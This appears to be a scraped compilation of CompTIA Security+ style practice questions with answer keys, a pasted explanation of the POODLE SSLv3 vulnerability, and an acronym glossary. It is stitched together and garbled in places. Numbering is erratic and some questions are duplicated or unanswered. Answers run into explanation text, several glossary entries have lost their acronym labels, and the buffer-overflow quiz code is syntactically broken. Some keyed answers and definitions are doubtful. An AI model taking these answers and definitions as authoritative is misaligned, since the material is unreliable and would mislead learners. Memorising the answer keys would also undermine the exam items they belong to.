QUESTION 87A security administrator is trying to eradicate a worm, which is spreading throughout the organization, using anold remote vulnerability in the SMB protocol. The worm uses Nmap to identify target hosts within the company.The administrator wants to implement a solution that will eradicate the current worm and any future attacks thatmay be using zero-day vulnerabilities. Which of the following would BEST meet the requirements whenimplemented?A. Host-based firewallB. Enterprise patch management systemC. Network-based intrusion prevention systemD. Application blacklistingE. File integrity checking

Correct Answer: C

QUESTION 89A procedure differs from a policy in that it:A. is a high-level statement regarding the company's position on a topic.B. sets a minimum expected baseline of behavior.C. provides step-by-step instructions for performing a task.D. describes adverse actions when violations occur.

Correct Answer: C

QUESTION 9 A vulnerability scan is being conducted against a desktop system. The scan is looking for files, versions, and registry values known to be associated with system vulnerabilities. Which of the following BEST describes the type of scan being performed? A. Non-intrusive B. Authenticated C. Credentialed D. Active

Correct Answer: C

QUESTION 122Which of the following is an asymmetric function that generates a new and separate key every time it runs? A. RSA B. DSA C. DHE D. HMAC E. PBKDF2

Correct Answer: C although Diffie-Hellman key agreement itself is a non-authenticated key-agreement protocol, it provides the basis for a variety of authenticated protocols, and is used to provide forward secrecy in Transport Layer Security's ephemeral modes (referred to as EDH or DHE depending on the cipher suite).

QUESTION 135The POODLE attack is an MITM exploit that affects: A. TLS1.0 with CBC mode cipher B. SSLv2.0 with CBC mode cipher C. SSLv3.0 with CBC mode cipher D. SSLv3.0 with ECB mode cipher

Correct Answer: CA flaw was found in the way SSL 3.0 handled padding bytes when decrypting messages encrypted using block ciphers in cipher block chaining (CBC) mode. How To Protect your Server Against the POODLE SSLv3 Vulnerability On October 14th, 2014, a vulnerability in version 3 of the SSL encryption protocol was disclosed. This vulnerability, dubbed POODLE (Padding Oracle On Downgraded Legacy Encryption), allows an attacker to read information encrypted with this version of the protocol in plain text using a man-in-the-middle attack. Although SSLv3 is an older version of the protocol which is mainly obsolete, many pieces of software still fallback on SSLv3 if better encryption options are not available. More importantly, it is possible for an attacker to force SSLv3 connections if it is an available alternative for both participants attempting a connection. The POODLE vulnerability affects any services or clients that make it possible to communicate using SSLv3.Because this is a flaw with the protocol design and not an implementation issue, every piece of software that uses SSLv3 is vulnerable. To find out more information about the vulnerability, consult the CVE information found at CVE-2014-3566. What is the POODLE Vulnerability? The POODLE vulnerability is a weakness in version 3 of the SSL protocol that allows an attacker in a man-in the-middle context to decipher the plain text content of an SSLv3 encrypted message. Who is Affected by this Vulnerability? This vulnerability affects every piece of software that can be coerced into communicating with SSLv3. This means that any software that implements a fallback mechanism that includes SSLv3 support is vulnerable and can be exploited. Some common pieces of software that may be affected are web browsers, web servers, VPN servers, mail servers, etc. How Does It Work? In short, the POODLE vulnerability exists because the SSLv3 protocol does not adequately check the padding bytes that are sent with encrypted messages. Since these cannot be verified by the receiving party, an attacker can replace these and pass them on to the intended destination. When done in a specific way, the modified payload will potentially be accepted by the recipient without complaint. An average of once out of every 256 requests will accept at the destination, allowing the attacker to decrypt a single byte. This can be repeated easily in order to progressively decrypt additional bytes. Any attacker able to repeatedly force a participant to resend data using this protocol can break the encryption in a very short amount of time. How Can I Protect Myself? Actions should be taken to ensure that you are not vulnerable in your roles as both a client and a server. Since encryption is usually negotiated between clients and servers, it is an issue that involves both parties. Servers and clients should take steps to disable SSLv3 support completely. Many applications use better encryption by default, but implement SSLv3 support as a fallback option. This should be disabled, as a malicious user can force SSLv3 communication if both participants allow it as an acceptable method.

QUESTION 113Confidential emails from an organization were posted to a website without the organization's knowledge. Upon investigation, it was determined that the emails were obtained from an internal actor who sniffed the emails in plain text. Which of the following protocols, if properly implemented, would have MOST likely prevented the emails from being sniffed? (Select TWO)A. Secure IMAPB. DNSSECC. S/MIMED. SMTPSE. HTTPS

Correct Answer: CD SMTPS (Simple Mail Transfer Protocol Secure) is a deprecated method for securing SMTP with transport layer security. It is intended to provide authentication of the communication partners, as well as data integrity and confidentiality. SMTPS is not a proprietary protocol and not an extension of SMTP. It is just a way to secure SMTP at the transport layer. SMTPS uses port 465.

QUESTION 40A company has noticed multiple instances of proprietary information on public websites. It has also observed anincrease in the number of email messages sent to random employees containing malicious links and PDFs.Which of the following changes should the company make to reduce the risks associated with phishingattacks? (Select TWO)A. Install an additional firewallB. Implement a redundant email serverC. Block access to personal email on corporate systemsD. Update the X.509 certificates on the corporate email serverE. Update corporate policy to prohibit access to social media websitesF. Review access violation on the file server

Correct Answer: CE

QUESTION 102A security analyst is reviewing patches on servers. One of the servers is reporting the following error message in the WSUS management console: The computer has not reported status in 30 days.Given this scenario, which of the following statements BEST represents the issue with the output above? A. The computer in question has not pulled the latest ACL policies for the firewall. B. The computer in question has not pulled the latest GPO policies from the management server. C. The computer in question has not pulled the latest antivirus definitions from the antivirus program. D. The computer in question has not pulled the latest application software updates.

Correct Answer: D

QUESTION 105A bank is experiencing a DoS attack against an application designed to handle 500IP-based sessions. in addition, the perimeter router can only handle 1Gbps of traffic. Which of the following should be implemented to prevent a DoS attacks in the future? A. Deploy multiple web servers and implement a load balancer B. Increase the capacity of the perimeter router to 10 Gbps C. Install a firewall at the network to prevent all attacks D. Use redundancy across all network devices and services

Correct Answer: D

QUESTION 106A malicious system continuously sends an extremely large number of SYN packets to a server. Which of the following BEST describes the resulting effect? A. The server will be unable to serve clients due to lack of bandwidth B. the server's firewall will be unable to effectively filter traffic due to the amount of data transmitted C. The server will crash when trying to reassemble all the fragmented packets D. The server will exhaust its memory maintaining half-open connections

Correct Answer: D

QUESTION 107A systems administrator is deploying a new mission essential server into a virtual environment. Which of the following is BEST mitigated by the environment's rapid elasticity characteristic? A. Data confidentiality breaches B. VM escape attacks C. Lack of redundancy D. Denial of service

Correct Answer: D

QUESTION 10A security technician has been receiving alerts from several servers that indicate load balancers have had asignificant increase in traffic. The technician initiates a system scan. The scan results illustrate that the diskspace on several servers has reached capacity. The scan also indicates that incoming internet traffic to theservers has increased. Which of the following is the MOST likely cause of the decreased disk space?A. Misconfigured devicesB. Logs and events anomaliesC. Authentication issuesD. Unauthorized software

Correct Answer: D

QUESTION 115An external auditor visits the human resources department and performs a physical security assessment. The auditor observed documents on printers that are unclaimed. A closer look at these documents reveals employee names, addresses, ages, and types of medical and dental coverage options each employee has selected. Which of the following is the MOST appropriate actions to take? A. Flip the documents face down so no one knows these documents are PII sensitive B. Shred the documents and let the owner print the new set C. Retrieve the documents, label them with a PII cover sheet, and return them to the printer D. Report to the human resources manager that their personnel are violating a privacy policy

Correct Answer: D

QUESTION 121An office manager found a folder that included documents with various types of data relating to corporate clients. The office manager notified the data included dates of birth, addresses, and phone numbers for the clients. The office manager then reported this finding to the security compliance officer. Which of the following portions of the policy would the security officer need to consult to determine if a breach has occurred? A. Public B. Private C. PHI D. PII

Correct Answer: D

QUESTION 132A security engineer is configuring a wireless network with EAP-TLS. Which of the following activities is a requirement for this configuration? A. Setting up a TACACS+ server B. Configuring federation between authentication servers C. Enabling TOTP D. Deploying certificates to endpoint devices

Correct Answer: D

QUESTION 133Several workstations on a network are found to be on OS versions that are vulnerable to a specific attack. Which of the following is considered to be a corrective action to combat this vulnerability? A. Install an antivirus definition patch B. Educate the workstation users C. Leverage server isolation D. Install a vendor-supplied patch E. Install an intrusion detection system

Correct Answer: D

26. An administrator is replacing a wireless router. The configuration of the old wireless router was not documented before it stopped functioning. The equipment connecting to the wireless network uses older legacy equipment that was manufactured prior to the release of the 802.11i standard. Which of the following configuration options should the administrator select for the new wireless router? a. WPA + CCMP b. WPA2 + CCMP c. WPA + TKIP d. WPA2 + TKIP

34. Which of the following is used to validate the integrity of data? a. CBC b. Blowfish c. MD5 d. RSA

48. An audit report has identified a weakness that could allow unauthorized personnel access to the facility at its main entrance and from there gain access to the network. Which of the following would best resolve the vulnerability? a. Faraday cage b. Air gap c. Mantrap d. Bollards

QUESTION 101An analyst is using a vulnerability scanner to look for common security misconfigurations on devices. Which of the following might be identified by the scanner? (Select TWO). A. The firewall is disabled on workstations. B. SSH is enabled on servers. C. Browser homepages have not been customized. D. Default administrator credentials exist on networking hardware .E. The OS is only set to check for updates once a day.

Correct Answer: AD

QUESTION 125Despite having implemented password policies, users continue to set the same weak passwords and reuse old passwords. Which of the following technical controls would help prevent these policy violations? A. Password expiration B. Password length C. Password complexity D. Password history E. Password lockout

Correct Answer: AD

QUESTION 15 To determine the ALE of a particular risk, which of the following must be calculated? (Select TWO). A. ARO B. ROI C. RPO D. SLE E. RTO

Correct Answer: AD

QUESTION 30An organization is expanding its network team. Currently, it has local accounts on all network devices, but withgrowth, it wants to move to centrally managed authentication. Which of the following are the BEST solutions forthe organization? (Sect TWO)A. TACACS+B. CHAPC. LDAPD. RADIUSE. MSCHAPv2

Correct Answer: AD

QUESTION 94 To determine the ALE of a particular risk, which of the following must be calculated? (Select TWO). A. ARO B. ROI C. RPO D. SLE E. RTO

Correct Answer: AD

QUESTION 137Ann, a security administrator, wants to ensure credentials are encrypted in transit when implementing a radius server for SSO. Which of the following are needed given these requirements? (Select TWO) A. Public key B. Shared key C. Elliptic curve D. MD5 E. Private key F. DES

Correct Answer: AE

QUESTION 14 Ann, a security administrator, wants to ensure credentials are encrypted in transit when implementing a RADIUS server for SSO. Which of the following are needed given these requirements? (Select TWO) A. Public key B. Shared key C. Elliptic curve D. MD5 E. Private key F. DES

Correct Answer: AE

QUESTION 24 A user needs to send sensitive information to a colleague using PKI. Which of the following concepts apply when a sender encrypts the message hash with the sender's private key? (Select TWO) A. Non-repudiation B. Email content encryption C. Steganography D. Transport security E. Message integrity

Correct Answer: AE

QUESTION 6 Which of the following could occur when both strong and weak ciphers are configured on a VPN concentrator? (Select TWO) A. An attacker could potentially perform a downgrade attack. B. The connection is vulnerable to resource exhaustion. C. The integrity of the data could be at risk. D. The VPN concentrator could revert to L2TP. E. The IPSec payload to 16-bit sequence numbers.

Correct Answer: AE

QUESTION 100A systems administrator is configuring a system that uses data classification labels. Which of the following will the administrator need to implement to enforce access control? A. Discretionary access control B. Mandatory access control C. Role-based access control D. Rule-based access control

Correct Answer: B

QUESTION 27A security engineer must install the same x.509 certificate on three different servers. The client application thatconnects to the server performs a check to ensure the certificate matches the host name. Which of thefollowing should the security engineer use?A. Wildcard certificateB. Extended validation certificateC. Certificate chainingD. Certificate utilizing the SAN file

Correct Answer: DSAN = Subject Alternate Names

65. A company wants to provide and for and enforce wireless access accountability during events where external speakers are invited to make presentations to a mixed audience of employees and non-employees. Which of the following should the administrator implement? a. Shared accounts b. Pre-shared passwords c. Least privilege d. Sponsored guest

QUESTION 142 Ann, a user, states that her machine has been behaving erratically over the past week. She has experienced slowness and input lag and found text files that appear to contain pieces of her emails or online conversations with coworkers. The technician runs a standard virus scan but detects nothing. Which of the following types of malware has infected the machine? A. Ransomware B. Rootkit C. Backdoor D.Keylogger

Correct Answer: D

QUESTION 20 Which of the following is commonly done as part of a vulnerability scan? A. Exploiting misconfigured applications B. Cracking employee passwords C. Sending phishing emails to employees D. Identifying unpatched workstations

Correct Answer: D

QUESTION 22To help prevent one job role from having sufficient access to create, modify, and approve payroll data, which ofthe following practices should be employed?A. Least privilegeB. Job rotationC. Background checksD. Separation of duties

Correct Answer: D

QUESTION 23When attackers use a compromised host as a platform for launching attacks deeper into a company's network,it is said that they are:A. escalating privilegeB. becoming persistentC. fingerprintingD. pivoting

Correct Answer: D

QUESTION 26A home invasion occurred recently in which an intruder compromised a home network and accessed a WiFIenabledbaby monitor while the baby's parents were sleeping. Which of the following BEST describes how theintruder accessed the monitor?A. Outdated antivirusB. WiFi signal strengthC. Social engineeringD. Default configuration

Correct Answer: D

QUESTION 27 A web server, which is configured to use TLS with AES-GCM-256, SHA-384, and ECDSA, recently suffered an information loss breach. Which of the following is MOST likely the cause? A. Insufficient key bit length B. Weak cipher suite C. Unauthenticated encryption method D. Poor implementation

Correct Answer: D

67. In determining when it may be necessary to perform a credentialed scan against a system instead of a non-credentialed scan, which of the following requirements is most likely to influence this decision? a. The scanner must be able to enumerate the host OS of devices scanned b. The scanner must be able to footprint the network c. The scanner must be able to check for open ports with listening services d. The scanner must be able to audit file system permissions

70. A software developer is concerned about DLL hijacking in an application being written. Which of the following is the most viable mitigation measure of this type of attack? a. The DLL of each application should be set individually b. All calls to different DLLs should be hard coded in the application c. Access to DLLs from the Windows registry should be disabled d. The affected DLLs should be renamed to avoid future hijacking

GPS

Global Positioning System. GPS tracking can help locate lost mobile devices. Remote wipe, or remote sanitize, erases all data on lost devices. Full disk encryption protects the data on the device if it is lost.

GUI

Graphical user interface. Users interact with the graphical elements instead of typing in commands from a text interface. Windows is an example of a GUI.

GPO

Group Policy object. Group Policy is used within Microsoft Windows to manage users and computers. It is implemented on a domain controller within a domain. Administrators use it to create password policies, lock down the GUI, configure host-based firewalls, and much more.

HDD

Hard disk drive. A disk drive that has one or more platters and a spindle. In contrast, USB flash drives use flash memory.

HSM

Hardware security module. A removable or external device that can generate, store, and manage RSA keys used in asymmetric encryption. High-volume ecommerce sites use HSMs to increase the performance of SSL sessions. High-availability clusters needing encryption services can use clustered HSMs.

HMAC

Hash-based Message Authentication Code. An HMAC is a fixed length string of bits similar to other hashing algorithms such as MD5 and SHA-1, but it also uses a secret key to add some randomness to the result.

HVAC

Heating, ventilation, and air conditioning. HVAC systems increase availability by regulating airflow within datacenters and server rooms. They use hot and cold to regulate the cooling, thermostats to ensure a relatively constant temperature, and humidity controls to reduce the potential for static discharges, and damage from condensation. They are often integrated with fire alarm systems and either have dampers or the ability to be turned off in the event of a fire.

HIDS

Host-based intrusion detection system. An IDS used to monitor an individual server or workstation. It protects local resources on the host such as the operating system files.

HIPS

Host-based intrusion prevention system. An extension of a host-based IDS. Designed to react in real time to catch an attack in action.

HTML

Hypertext Markup Language. Language used to create web pages served on the Internet. HTML documents are displayed by web browsers and delivered over the Internet using HTTP or HTTPS. It uses less than and greater than characters (< and >) to create tags. Many sites use input validation to block these tags and prevent cross-site scripting attacks.

HTTPS

Hypertext Transfer Protocol Secure. Encrypts HTTP traffic with SSL or TLS using port 443.

HTTP

Hypertext Transfer Protocol. Used for web traffic on the Internet and in intranets. HTTP uses port 80.

Identification. For example, a protocol ID identifies a protocol based on a number. AH is identified with protocol ID number 51 and ESP is identified with protocol ID number 50.

IRT

Incident Response Team. A group of experts that respond to security incidents. Also known as CERT, CIRT, or SIRT.

IaaS

Infrastructure as a Service. A cloud computing technology useful for heavily utilized systems and networks. Organizations can limit their hardware footprint and personnel costs by renting access to hardware such as servers. Compare to PaaS and SaaS.

Initialization vector. An provides randomization of encryption keys to help ensure that keys are not reused. WEP was susceptible to IV attacks because it used relatively small IVs. In an IV attack, the attacker uses packet injection, increasing the number of packets to analyze, and discovers the encryption key.

Instant Messaging. Real-time direct text-based communication between two or more people, often referred to as chat.

IEEE

Institute of Electrical and Electronic Engineers. International organization with a focus on electrical, electronics, and information technology topics. IEEE standards are well respected and followed by vendors around the world.

ICMP

Internet Control Message Protocol. Used for diagnostics such as ping. Many DoS attacks use ICMP. It is common to block ICMP at firewalls and routers. If ping fails, but other connectivity to a server succeeds, it indicates that ICMP is blocked.

IGMP

Internet Group Management Protocol. Used for multicasting. Computers belonging to a multicasting group have a multicasting IP address in addition to a standard unicast IP address.

IIS

Internet Information Services. A Microsoft Windows web server. IIS comes free with Microsoft Windows Server products.

IKE

Internet Key Exchange. Used with IPsec to create a secure channel over port 500 in a VPN tunnel.

IMAP4

Internet Message Access Protocol v4. Used to store e-mail on servers and allow clients to manage their e-mail on the server. IMAP4 uses port 143.

IPsec

Internet Protocol Security. Used to encrypt traffic on the wire and can operate in both tunnel mode and transport mode. It uses tunnel mode for VPN traffic. IPsec is built into IPv6, but can also work with IPv4 and it includes both AH and ESP. AH provides authentication and integrity, and ESP provides confidentiality, integrity, and authentication. IPsec uses port 500 for IKE with VPN connections.

IPv4

Internet Protocol version 4. Identifies hosts using a 32-bit IP address. IPv4 is expressed in dotted decimal format with decimal numbers separated by dots or periods like this: 192.168.1.1.

IPv6

Internet Protocol version 6. Identifies hosts using a 128-bit address. IPv6 is expressed as eight groups of four hexadecimal characters (numbers and letters), such as this: FE80: 0000:0000:0000: 20D4:3FF7:003F:DE62.

IRC

Internet Relay Chat. A form of real-time Internet text messaging often used with chat sessions. Some botnets have used IRC channels to control zombie computers through a command and control server.

ISP

Internet Service Provider. Company that provides Internet access to customers.

IDS

Intrusion detection system. A detective control used to detect attacks after they occur. A signature-based IDS (also called definition-based) uses a database of predefined traffic patterns. An anomaly-based IDS (also called behavior-based) starts with a performance baseline of normal behavior and compares network traffic against this baseline. An IDS can be either host-based (HIDS) or network-based (NIDS). In contrast, a firewall is a preventative control that attempts to prevent the attacks before they occur. An IPS is a preventative control that will stop an attack in progress.

IPS

Intrusion prevention system. A preventative control that will stop an attack in progress. It is similar to an active IDS except that it's placed in line with traffic. An IPS can actively monitor data streams, detect malicious content, and stop attacks in progress.

KDC

Key Distribution Center. Part of the Kerberos protocol used for network authentication. The KDC issues time-stamped tickets that expire.

L2TP

Layer 2 Tunneling Protocol. Tunneling protocol used with VPNs. L2TP is commonly used with IPsec (L2TP/IPsec). L2TP uses port 1701.

LDAP

Lightweight Directory Access Protocol. Language used to communicate with directories such as Microsoft's Active Directory. It provides a central location to manage user accounts and other directory objects. LDAP uses port 389 when unencrypted and port 636 when encrypted.

LEAP

Lightweight Extensible Authentication Protocol. A modified version of the Challenge Handshake Authentication Protocol (CHAP) created by Cisco.

LANMAN

Local area network manager. Older authentication protocol used to provide backward compatibility to Windows 9x clients. LANMAN passwords are easily cracked due to how they are stored.

LAN

Local area network. Group of hosts connected within a network.

MITM

Man in the middle. A MITM attack is a form of active interception allowing an attacker to intercept traffic and insert malicious code sent to other clients. Kerberos provides mutual authentication and helps prevent MITM attacks.

MAC

Mandatory Access Control. Access control model that uses sensitivity labels assigned to objects (files and folders) and subjects (users). SELinux (deployed in both Linux and UNIX platforms) is a trusted operating system platform using the MAC model. Other access control models are DAC and RBAC.

MBR

Master Boot Record. An area on a hard disk in its first sector. When the BIOS boots a system, it looks at the MBR for instructions and information on how to boot the disk and load the operating system. Some malware tries to hide here.

MTU

Maximum Transmission Unit. The MTU identifies the size of data that can be transferred.

MAC

Media access control. A 48-bit address used to uniquely identify network interface cards. It also called a hardware address or a physical address, and is commonly displayed as six pairs of hexadecimal characters. Port security on a switch can limit access using MAC filtering. Wireless access points can use MAC filtering to restrict access to only certain clients, though an attacker can easily beat this.

MD5

Message Digest 5. A hashing function used to provide integrity. MD5 uses 128 bits. A hash is simply a number created by applying the algorithm to a file or message at different times. The hashes are compared to each other to verify that integrity has been maintained.

MAC

Message authentication code. Method used to provide integrity for messages. A MAC uses a secret key to encrypt the hash. Some versions called HMAC.

MAN

Metropolitan area network. A computer network that spans a metropolitan area such as a city or a large campus

MS-CHAP

Microsoft Challenge Handshake Authentication Protocol. Microsoft's implementation of CHAP. MS-CHAPv2 provides mutual authentication.

NIST

National Institute of Standards and Technology. NIST is a part of the U.S. Department of Commerce, and it includes an Information Technology Laboratory (ITL). The ITL publishes special publications related to security that are freely available for download here: http://csrc.nist.gov/publications/PubsSPs.html.

NAT

Network Address Translation. A service that translates public IP addresses to private and private IP addresses to public. It hides addresses on an internal network.

NOS

Network Operating System. Software that runs on a server and enables the server to manage resources on a network.

BOTS

Network Robots. An automated program or system used to perform one or more tasks. A malicious botnet is group of computers called zombies and controlled through a command-and-control server. Attackers use malware to join computers to botnets. Zombies regularly check in with the command-and-control server and can launch DDoS attacks against other victims. Botnet activity often includes hundreds of outbound connections, and some botnets use Internet Relay Chat (IRC) channels.

NTP

Network Time Protocol. Protocol used to synchronize computer times.

NAC

Network access control. Inspects clients for health and can restrict network access to unhealthy clients to a remediation network. Clients run agents and these agents report status to a NAC server. NAC is used for VPN and internal clients. MAC filtering is a form of NAC.

NIDS

Network-based intrusion detection system. IDS used to monitor a network. It can detect network-based attacks, such as smurf attacks. A NIDS cannot monitor encrypted traffic, and cannot monitor traffic on individual hosts.

NIPS

Network-based intrusion prevention system. An IPS that monitors the network. An IPS can actively monitor data streams, detect malicious content, and stop attacks in progress.

NTFS

New Technology File System. A file system used in Microsoft operating systems that provides security. NTFS uses the DAC model.

NTLM

New Technology LANMAN. Authentication protocol intended to improve LANMAN. The LANMAN protocol stores passwords using a hash of the password by first dividing the password into two seven-character blocks, and then converting all lowercase letters to uppercase. This makes LANMAN easy to crack. NTLM stores passwords in LANMAN format for backward compatibility, unless the passwords are greater than fifteen characters. NTLMv1 is older and has known vulnerabilities. NTLMv2 is newer and secure.

NOOP

No operation, sometimes listed as NOP. NOOP instructions are often used in a buffer overflow attack. An attacker often writes a large number of NOOP instructions as a NOOP sled into memory, followed with malicious code.

OVAL

Open Vulnerability Assessment Language. International standard proposed for vulnerability assessment scanners to follow.

Operating system. For example, SELinux is a trusted OS that can help prevent malicious code from executing.

PTZ

Pan tilt zoom. Refers to cameras that can pan (move left and right), tilt (move up and down), and zoom to get a closer or a wider view.

PAP

Password Authentication Protocol. An older authentication protocol where passwords are sent across the network in clear text. Rarely used today.

P2P

Peer-to-peer. P2P applications allow users to share files such as music, video, and data over the Internet. Data leakage occurs when users install P2P software and unintentionally share files. Organizations often block P2P software at the firewall and detect running software with port scans.

PED

Personal Electronic Device. Small devices such as cell telephones, radios, CD players, DVD players, video cameras, and MP3 players.

Personal identification number. A number known by a user and entered for authentication. PINs are often combined with smart cards to provide two-factor authentication.

PIV

Personal identity verification card. A specialized type of smart card used by United States federal agencies. It includes photo identification and provides confidentiality, integrity, authentication, and non-repudiation for the users. It is similar to a CAC.

PII

Personally Identifiable Information. Information about individuals that can be used to trace a person's identity, such as a full name, birthdate, biometric data, and identifying numbers such as a Social Security number (SSN). Organizations have an obligation to protect PII and often identify procedures for handling and retaining PII in data policies.

POTS

Plain old telephone service. Voice grade telephone service available.

PaaS

Platform as a Service. Provides cloud customers with an easy-to-configure operating system and on-demand computing capabilities. Compare to IaaS and SaaS.

PPP

Point-to-Point Protocol. Used to create remote access connections.

PPTP

Point-to-Point Tunneling Protocol. Tunneling protocol used with VPNs. PPTP uses TCP port 1723.

PAT

Port Address Translation. A form of network address translation.

POP3

Post Office Protocol v3. Used to transfer e-mail from mail servers to clients. POP3 uses port 110.

PSK

Pre-shared key. A secret shared among different systems. Wireless networks support Personal Mode, where each device uses the same PSK. In contrast, Enterprise Mode uses an 802.1x or RADIUS server for authentication.

PGP

Pretty Good Privacy. Commonly used to secure e-mail communications between two private individuals but is also used in companies. It provides confidentiality, integrity, authentication, and non-repudiation. It can digitally sign and encrypt e-mail. It uses both asymmetric and symmetric encryption.

PBX

Private Branch Exchange. A telephone switch used to telephone calls.

PEAP

Protected Extensible Authentication Protocol. PEAP provides an extra layer of protection for EAP. PEAP-TLS uses TLS to encrypt the authentication process by encapsulating and encrypting the EAP conversation in a Transport Layer Security (TLS) tunnel. Since TLS requires a certificate, PEAP-TLS requires a certification authority (CA) to issue certificates.

PKI

Public Key Infrastructure. Group of technologies used to request, create, manage, store, distribute, and revoke digital certificates. Certificates are an important part of asymmetric encryption. Certificates include public keys along with details on the owner of the certificate and on the CA that issued the certificate. Certificate owners share their public key by sharing a copy of their certificate.

SSID

Service Set Identifier. Identifies the name of a wireless network. Disabling SSID broadcast can hide the network from casual users but an attacker can easily discover it with a wireless sniffer. It's recommended to change the SSID from the default name.

SLA

Service level agreement. An agreement between a company and a vendor that stipulates performance expectations, such as minimum uptime and maximum downtime levels.

STP

Shielded twisted pair. Cable type used in networks that includes shielding to prevent interference from EMI and RFI. It can also prevent data from emanating outside the cable.

SMTP

Simple Mail Transfer Protocol. Used to transfer e-mail between clients and servers and between e-mail servers and other e-mail servers. SMTP uses port 25.

SNMP

Simple Network Management Protocol. Used to manage network devices such as routers or switches. SNMP agents report information via notifications known as SNMP traps, or SNMP device traps.

SLE

Single loss expectancy. Used to measure risk with annualized loss expectancy (ALE) and annualized rate of occurrence (ARO). The SLE identifies the expected dollar amount for a single event resulting in a loss. The calculation is SLE x ARO = ALE.

SPOF

Single point of failure. An SPOF is any component whose failure results in the failure of an entire system. Elements such as RAID, failover clustering, UPS, and generators remove many single points of failure.

SSO

Single sign-on. Authentication method where users can access multiple resources on a network using a single account. SSO can provide central authentication against a federated database for different operating systems.

SCSI

Small Computer System Interface. Set of standards used to connect peripherals to computers. Commonly used for SCSI hard disks and/or tape drives.

SDLM

Software Development Life Cycle Methodology. The practice of using a SDLC when developing applications.

SDLC

Software Development Life Cycle. A software development process. Many different models are available.

SaaS

Software as a Service. Applications provided over the Internet. Webmail is an example of a cloud-based technology. Compare to IaaS and PaaS.

SPIM

Spam over Internet Messaging. A form of spam using instant messaging that targets instant messaging users

STP

Spanning Tree Protocol. Protocol enabled on most switches that protects against switching loops. A switching loop can be caused if two ports of a switch are connected together, such as those caused when two ports of a switch are connected together.

SQL

Structured query language. Used by SQL-based databases, such as Microsoft's SQL Server. Websites integrated with a SQL database are subject to SQL injection attacks. Input validation with forms and stored procedures help prevent SQL injection attacks. Microsoft's SQL Server uses port 1433 by default.

SIM

Subscriber Identity Module. A small smart card that contains programming and information for small devices such as cell phones.

SYN

Synchronize. The first packet in a TCP handshake. In a SYN flood attack, attackers send this packet, but don't complete the handshake after receiving the SYN/ACK packet. A flood guard is a logical control that protects against SYN flood attacks.

SONET

Synchronous Optical Network Technologies. A multiplexing protocol used to transfer data over optical fiber.

TKIP

Temporal Key Integrity Protocol. Wireless security protocol introduced to address the problems with WEP. TKIP was used with WPA but many implementations of WPA now support CCMP.

TACACS+

Terminal Access Controller Access-Control System+. Provides central authentication for remote access clients and used as an alternative to RADIUS. TACACS+ uses TCP port 49, compared with TACACS, which uses UDP port 49. It encrypts the entire authentication process, compared with RADIUS, which only encrypts the password. It uses multiple challenges and responses.

TACACS

Terminal Access Controller Access-Control System. An older remote authentication protocol that was commonly used in UNIX networks. TACACS+ is more commonly used.

TCO

Total cost of ownership. A factor considered when purchasing new products and services. TCO attempts to identify the cost of a product or service over its lifetime.

TCP

Transmission Control Protocol. Provides guaranteed delivery of IP traffic using a three-way handshake.

TCP/IP

Transmission Control Protocol/Internet Protocol. Represents the full suite of protocols.

TLS

Transport Layer Security. Used to encrypt traffic on the wire. TLS is the replacement for SSL and like SSL, it uses certificates issued by CAs. PEAP-TLS uses TLS to encrypt the authentication process and PEAP-TLS requires a CA to issue certificates.

3DES

Triple Digital Encryption Standard. A symmetric algorithm used to encrypt data and provide confidentiality. It was originally designed as a replacement for DES. It uses multiple keys and multiple passes and is not as efficient as AES, but is still used in some applications, such as when hardware doesn't support AES.

TFTP

Trivial File Transfer Protocol. Used to transfer small amounts of data with UDP port 69. In contrast, FTP is used to transfer larger files using TCP ports 20 and 21.

TPM

Trusted Platform Module. This is a hardware chip on the motherboard included on many newer laptops. A TPM includes a unique RSA asymmetric key, and it can generate and store other keys used for encryption, decryption, and authentication. TPM provides full disk encryption.

UPS

Uninterruptible power supply. A battery backup system that provides fault tolerance for power and can protect against power fluctuations. UPS provide short-term power giving the system enough time to shut down smoothly, or to transfer to generator power. Generators provide long-term power in extended outages.

URL

Universal Resource Locator. Address used to access web resources, such as http://GetCertifiedGetAhead.com. Pop-up blockers can include URLs of sites where pop-ups are allowed.

USB

Universal Serial Bus. A serial connection used to connect peripherals such as printers, flash drives, and external hard disk drives. Data on USB drives can be protected against loss of confidentiality with encryption. They combine high volume and transfer speeds with ease of concealment and often result in data leakage.

UTP

Unshielded twisted pair. Cable type used in networks that do not have any concerns over EMI, RFI, or cross talk. If these are a concern, STP is used.

UAT

User Acceptance Testing. One of the last phases of testing an application before its release.

UDP

User Datagram Protocol. Used instead of TCP when guaranteed delivery of each packet is not necessary. UDP uses a best-effort delivery mechanism.

WAF

Web application firewall. A firewall specifically designed to protect a web application, such as a web server. A WAF inspects the contents of traffic to a web server, can detect malicious content, and block it.

WPA2

Wi-Fi Protected Access version 2. Newer security protocol used to protect wireless transmissions. It supports CCMP for encryption, which is based on AES and stronger than TKIP which was originally released with WPA. In Enterprise Mode, it can use RADIUS to support 802.1x authentication. In personal mode, it uses a preshared key (PSK).

WPA

Wi-Fi Protected Access. Replaced WEP as a wireless security protocol without replacing hardware. Superseded by WPA2.

WEP

Wired Equivalent Privacy. Original wireless security protocol. Had significant security flaws and was replaced with WPA, and ultimately WPA2. WEP used RC4 incorrectly making it susceptible to IV attacks.

WTLS

Wireless Transport Layer Security. Used to encrypt traffic for smaller wireless devices.

WAP

Wireless access point, sometimes just called an access point (AP). Increasing the power level of a WAP increases the wireless coverage of the WAP. Decreasing the power levels, decreases the coverage. Coverage can also be manipulated by moving or positioning the wireless antenna.

WIDS

Wireless intrusion detection system. An IDS used for wireless networks.

WIPS

Wireless intrusion prevention system. An IPS used for wireless networks.

WLAN

Wireless local area network. Network connected wirelessly.

71. An analyst is reviewing a simple program for potential security vulnerabilities before being deployed to a windows server. Given the following code: Void foo (char *bar) (char random_user_input(12)

strcpy (random_user_input, bar) ;) Which of the following vulnerabilities is present? a. Bad memory pointer b. Buffer overflow c. Integer overflow d. Backdoor ;D

12. Which of the following solutions should an administrator use to reduce the risk from an unknown vulnerability in a third party software application? a. Sandboxing b. Encryption c. Code signing d. Fuzzing

57. An MS Windows account that enables users to have temporary access to a computer without the capability to install software or hardware, change settings, or create a user password is called: A. Guest account B. Temporary account C. Standard account D. Managed user account

. Answer: A. Guest account Explanation: An MS Windows account that enables users to have temporary access to a computer without the capability to install software or hardware, change settings, or create a user password is called Guest. Due to the fact that the Guest account in Windows allows a user to log on to a network, browse the Internet, and shut down the computer, it is recommended to keep it disabled when it isn't needed.

13. A replay attack occurs when an attacker intercepts user credentials and tries to use this information later for gaining unauthorized access to resources on a network. A. True B. False

